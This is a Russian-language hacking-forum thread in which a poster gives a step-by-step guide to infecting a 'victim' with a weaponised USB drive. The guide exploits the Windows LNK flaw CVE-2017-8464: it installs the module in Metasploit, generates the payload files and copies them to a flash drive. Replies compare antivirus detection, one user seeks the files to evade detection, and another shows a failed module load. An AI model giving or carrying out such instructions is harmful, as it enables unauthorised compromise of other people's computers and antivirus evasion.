• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

/bad USB CVE_2017_8464\ _ # by Ondrik8

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
Всем привет, смотрю пошла у нас движуха с USB девайсами для заражения жертв, ну думаю "че я лысый?) в трэнде нужно быть!" Правильно?_) Вот и представлю Вашему вниманию очередной способ заражения от меня)
Нам потребуется 5 минут USB - накопитель, Kali-linux и так едем... !

Screenshot_11.png


уязвимые ОС-и

Screenshot_12.png


переименовываем и телепортируем в метасплойт:

Код:
mv 42382 CVE_2017_8464_LNK_Rce.rb

Код:
mv CVE_2017_8464_LNK_Rce.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

запускаем MSF и обновляемся командой: reload_all и...

Screenshot_14.png


exploit -j

далее, настраиваем под себя уязвимость:

Код:
use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce


Screenshot_15.png


можете еще и порт настроить под себя, жмем: exploit

MSF сгенерит файлы, откроем скрытую папку где они лежат) командой: xdg-open /root/.msf4/local/

перенесем их в нашу злую USB-flash-ку )) и подсунем флэшку "жертве прогресса"!)) Как только "жертва" откроет у себя на компе для просмотра содержимого, у Вас появится заветная сессия!))

Удачи!
 
M

MrsRobot

спасибо! а как реагируют антивирусники, не тестил? есет будет ругаться?
 
  • Нравится
Реакции: Ondrik8
M

MrsRobot

не нетестил с антиками) если есть возможность? отпиши плиз..
где б достать такую редкость как флешка.. ?) неужели ими кто-то пользуется..?_)
а файл же остался у тебя? может на вирустотал закинешь, проверишь? была бы благодарна..)
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
где б достать такую редкость как флешка.. ?) неужели ими кто-то пользуется..?_)
а файл же остался у тебя? может на вирустотал закинешь, проверишь? была бы благодарна..)
У Вас нету разве простой USB флэшки?)) там много файлов и НЕ НУЖНО на вирус-тотал закидывать что либо !!!!!!!!!!!!! про это уже знают все)
 
  • Нравится
Реакции: s1rk0 и persivald
M

MrsRobot

360 total security - палит троян как только флешку втыкнула
есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
У Вас нету разве простой USB флэшки?)) там много файлов и НЕ НУЖНО на вирус-тотал закидывать что либо !!!!!!!!!!!!! про это уже знают все)
ок..сама потестирую будет время
у нас все в облаках
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
ок..сама потестирую будет время
у нас все в облаках





 

persivald

Green Team
24.07.2017
56
71
BIT
0
есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
ок..сама потестирую будет время
у нас все в облаках
есет смарт секьюрити (лицензия) обнаруживает трояна
 
  • Нравится
Реакции: Vertigo и Ondrik8
Д

Дедок

кто может выложите плез файлы которые на флешку подкладываются нет под рукой метасплойта чеб сгенерить, покумекаю мож че как детект сбить.
 
G

gt76g

При подключении флешки произойдет авторан эксплoитa?
 
I

IioS

кто может выложите плез файлы которые на флешку подкладываются нет под рукой метасплойта чеб сгенерить, покумекаю мож че как детект сбить.
Пагади... Там ж под каждый ип отдельны, могу помочь, дай только свой локальный ип(с той сети где будешь тестить)
 
Д

Дедок

Пагади... Там ж под каждый ип отдельны, могу помочь, дай только свой локальный ип(с той сети где будешь тестить)
не мне нужно взглянуть на файлы что они из себя представляют для начала
 
Д

Дедок

мне нужны именно ФАЙЛЫ которые на этой картинке ) не скрин ) понять в каком моменте детект идет какой кусок кода или на каком методе палево идет если моя мысль правильная когда я просматривал код экспа то есть идея как сбить, нужно тестнуть в обшем
 

ghost

Well-known member
12.05.2016
1 636
3 288
BIT
0
Девушка.... что хотеть?)

Чето фильм вспомнился "девушка с тату дракона")
Хороший фильм
Код:
msf > -j
[-] Unknown command: -j.
msf >
msf > use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
[-] Failed to load module: exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
msf >
 
Последнее редактирование:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!